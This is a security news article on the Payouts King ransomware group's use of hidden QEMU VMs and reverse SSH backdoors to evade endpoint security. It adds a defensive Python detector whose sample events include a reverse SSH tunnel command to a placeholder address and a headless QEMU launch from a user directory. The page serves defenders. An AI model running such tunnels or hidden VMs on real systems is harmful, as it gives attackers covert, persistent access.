Payouts King Ransomware Uses QEMU VMs to Evade Security – Veri Sızıntısı

Payouts King Ransomware Uses QEMU VMs to Bypass Security

The Payouts King ransomware group has adopted a novel technique, leveraging QEMU virtual machines to evade endpoint security measures. This method involves creating hidden virtual environments on compromised systems, enabling the ransomware to execute undetected and encrypt data.

Payouts King Ransomware's New Tactics

A recent report reveals that the Payouts King ransomware group is employing a sophisticated new method to bypass conventional endpoint security solutions. This group is utilizing the QEMU emulator to establish reverse SSH backdoors, facilitating the execution of hidden virtual machines on targeted systems.

Understanding the Attack Method

The core of this advanced attack lies in the deployment of QEMU (Quick EMUlator), a generic and open-source machine emulator and virtualizer. Instead of directly executing malicious payloads on the host system, Payouts King ransomware operators use QEMU to:

  • Establish Reverse SSH Backdoors: This allows attackers to maintain persistent access and control over the compromised system, often without being flagged by security tools.
  • Run Hidden Virtual Machines: By running the ransomware payload within a stealthy, isolated virtual environment, the malicious activity is effectively masked from the host operating system's security agents. These VMs are designed to operate beneath the radar of standard endpoint detection and response (EDR) systems.

This approach presents a significant challenge for cybersecurity defenses, as the malicious actions are contained within an environment that security tools might not be monitoring or are unable to fully inspect, allowing the ransomware to encrypt data without triggering alarms.

Implications for Organizations

The use of QEMU VMs by Payouts King highlights an evolving threat landscape where ransomware groups are investing in more intricate methods to achieve their objectives. Organizations must:

  • Enhance Monitoring Capabilities: Move beyond signature-based detection to advanced behavioral analysis that can spot unusual system processes or resource utilization indicative of virtual machine execution.
  • Strengthen Endpoint Protection: Implement multi-layered security strategies that include advanced threat prevention, detection, and response across all endpoints.
  • Regularly Update & Patch: Ensure all systems and security software are kept up-to-date to mitigate known vulnerabilities.
  • Employee Training: Educate staff on phishing and social engineering tactics, which often serve as initial compromise vectors.
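As an added illustration of the behavioral monitoring recommended above (example code written for this page, not from the article or from the BleepingComputer source), the following script scores process-creation events for two of the behaviors the article describes: a QEMU system emulator launched from outside its expected install directories or run headless, and an SSH client started with a remote (reverse) port forward. The JSON event format, the allowlisted QEMU directories, the rule names and the sample events are all constructed assumptions; tune the allowlist to where QEMU is legitimately installed in your environment.

```python
"""Constructed detection example: score process-creation events for signs of a
hidden QEMU VM or a reverse SSH tunnel. Event schema, directory allowlist and
rule names are assumptions for this example, not from any vendor product."""
import json
from dataclasses import dataclass

# Assumed allowlist: directories from which a sanctioned QEMU install runs.
TRUSTED_QEMU_DIRS = ("/usr/bin/", "/usr/libexec/", "C:\\Program Files\\qemu\\")


@dataclass(frozen=True)
class Finding:
    rule: str
    severity: str
    pid: int
    detail: str


def _basename(image: str) -> str:
    """Lower-case file name of an image path, handling both path separators."""
    return image.replace("\\", "/").rsplit("/", 1)[-1].lower()


def _headless(args: list[str]) -> bool:
    """True if the QEMU command line asks for no display or detaches itself."""
    for i, a in enumerate(args):
        if a in ("-nographic", "-daemonize"):
            return True
        if a == "-display" and i + 1 < len(args) and args[i + 1].lower() == "none":
            return True
    return False


def _reverse_forwards(args: list[str]) -> list[str]:
    """Collect every -R spec ([bind:]port:host:hostport) on an ssh command line."""
    specs = []
    for i, a in enumerate(args):
        if a == "-R" and i + 1 < len(args):
            specs.append(args[i + 1])
        elif a.startswith("-R") and len(a) > 2:  # attached form, e.g. -R2222:localhost:22
            specs.append(a[2:])
    return specs


def analyze_event(event: dict) -> list[Finding]:
    """Apply the rules to one process-creation event (keys: pid, image, cmdline)."""
    findings = []
    pid, image = event["pid"], event["image"]
    args = event["cmdline"].split()
    name = _basename(image)

    if name.startswith("qemu-system"):
        untrusted = not image.startswith(TRUSTED_QEMU_DIRS)
        if untrusted:
            findings.append(Finding("qemu_untrusted_path", "high", pid, image))
        if _headless(args):
            # Headless QEMU from a sanctioned path is normal on servers; from an
            # unexpected path it matches the hidden-VM pattern in the article.
            severity = "high" if untrusted else "low"
            findings.append(Finding("qemu_headless", severity, pid, " ".join(args)))
    elif name in ("ssh", "ssh.exe", "plink.exe"):
        for spec in _reverse_forwards(args):
            findings.append(Finding("ssh_reverse_forward", "medium", pid, spec))
    return findings


def analyze_log(lines) -> list[Finding]:
    """Run analyze_event over JSON-lines input, skipping blank lines."""
    findings = []
    for line in lines:
        line = line.strip()
        if line:
            findings.extend(analyze_event(json.loads(line)))
    return findings


# Constructed sample events: one benign QEMU launch, one suspicious headless
# launch from a user-writable directory, one reverse SSH tunnel to a TEST-NET
# address, one ordinary SSH session.
SAMPLE_LOG = r"""
{"pid": 101, "image": "/usr/bin/qemu-system-x86_64", "cmdline": "qemu-system-x86_64 -m 4096 -hda /var/lib/vms/dev.qcow2"}
{"pid": 202, "image": "C:\\Users\\Public\\qemu\\qemu-system-x86_64.exe", "cmdline": "qemu-system-x86_64.exe -m 2048 -hda disk.qcow2 -display none -daemonize"}
{"pid": 303, "image": "/usr/bin/ssh", "cmdline": "ssh -N -R 2222:localhost:22 user@203.0.113.10"}
{"pid": 404, "image": "/usr/bin/ssh", "cmdline": "ssh admin@10.0.0.5"}
"""

if __name__ == "__main__":
    for f in analyze_log(SAMPLE_LOG.splitlines()):
        print(f"[{f.severity}] pid={f.pid} {f.rule}: {f.detail}")
```

The rules are deliberately narrow so they can be read and tuned: the path allowlist catches QEMU binaries dropped into user-writable locations, the headless check separates interactive desktop use from detached VMs, and the `-R` check surfaces reverse forwards regardless of the destination. In production these would feed a correlation step (same host, short time window) rather than firing individually, and the allowlist would come from software inventory rather than a constant.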

Source

https://www.bleepingcomputer.com/news/security/payouts-king-ransomware-uses-qemu-vms-to-bypass-endpoint-security/